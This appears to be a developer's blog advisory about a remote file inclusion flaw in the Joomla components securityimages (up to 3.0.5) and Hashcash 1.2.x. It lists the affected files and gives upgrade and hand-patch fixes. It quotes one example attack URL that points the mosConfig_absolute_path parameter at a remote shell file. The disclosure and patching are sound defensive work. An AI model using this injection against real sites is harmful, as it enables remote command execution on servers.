Select Page

Security risk in securityimages

Security risk in securityimages

The webmaster of janwiersma.com sent me an email today
at 6:12AM , his server was hacked because of a bug in
securityimages. This bug allows a remote atacker to
execute commands via remote forceful include and
execute function on your server
and affect ALL version of securityimages <= 3.0.5

Here are all files which put your server at risk:
client.php, configinsert.php, lang.php, server.php

Example of attack:
http://web/components/com_securityimages/
configinsert.php?mosConfig_absolute_path=http://shell.txt
from http://securityreason.com/exploitalert/892
Secunia has also a report on it: http://secunia.com/product/11186/

In fact I forget to use that line in these files:
defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’);
This avoid any requests to access directly this file. 

– upgrade to 3.0.6 (download at #Joomla Forge or in my download sections) OR
– patch the faulty files by hand (add defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’); at the beginning of each file)

Please also contact all Your friends which are using securityimages!

And for my other components?

Hashcash 1.2.X is also affected: http://secunia.com/product/11046/  and my patch is avalaible!

– upgrade to 1.2.2  (download at #Joomla Forge or in my download sections) OR
– patch the faulty files by hand (add defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’); at the beginning of each file)

JoomlaCloud is NOT affected

YOU ARE ALL URGE TO UPGRADE ASAP!

About The Author

I worked with various Insurances companies across Switzerland on online applications handling billion premium volumes. I love to continuously spark my creativity in many different and challenging open-source projects fueled by my great passion for innovation and blockchain technology.In my technical role as a senior software engineer and Blockchain consultant, I help to define and implement innovative solutions in the scope of both blockchain and traditional products, solutions, and services. I can support the full spectrum of software development activities, starting from analyzing ideas and business cases and up to the production deployment of the solutions.I'm the Founder and CEO of Disruptr GmbH.

Categories